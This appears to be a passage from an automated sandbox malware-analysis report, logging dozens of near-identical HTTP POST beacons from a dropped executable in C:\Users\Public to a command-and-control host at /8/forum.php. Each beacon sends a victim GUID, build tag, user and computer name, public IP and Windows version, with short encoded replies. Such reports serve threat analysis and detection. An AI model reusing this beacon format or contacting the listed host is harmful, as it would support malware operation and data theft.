                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:08.301796913 CEST6066INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:09 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHJQSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  38192.168.2.34979277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:08.911281109 CEST6066OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:08.978708029 CEST6067INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQZAJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  39192.168.2.34979377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:09.286073923 CEST6068OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:09.355176926 CEST6068INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:10 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHNMSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.34975877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:53.896061897 CEST5639OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:53.964401007 CEST5688INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCAZXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  40192.168.2.34979477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:09.661709070 CEST6069OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:09.730118990 CEST6069INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTNMGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  41192.168.2.34979577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.059182882 CEST6070OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.127449989 CEST6070INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 54 47 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNTGMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  42192.168.2.34979677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.434488058 CEST6071OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.502567053 CEST6071INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:11 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQFUJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  43192.168.2.34979777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:10.798916101 CEST6072OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:10.867554903 CEST6073INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTHSGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  44192.168.2.34979877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:12.563224077 CEST6073OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:12.632021904 CEST6074INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMMNNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  45192.168.2.34979977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:12.942617893 CEST6074OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.008268118 CEST6075INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNYBMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  46192.168.2.34980077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:13.320719004 CEST6076OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.388214111 CEST6076INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cVZAEARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  47192.168.2.34980177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:13.690525055 CEST6077OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:13.764219046 CEST6077INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4d 4e 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTMNGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  48192.168.2.34980277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:14.084805965 CEST6078OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:14.151746035 CEST6078INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 59 42 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNYBMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  5192.168.2.34975977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:54.344192028 CEST5702OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:54.414891005 CEST5703INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:55 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cZNMAARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  6192.168.2.34976077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:54.742374897 CEST5716OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:54.810606956 CEST5801INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTKPGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
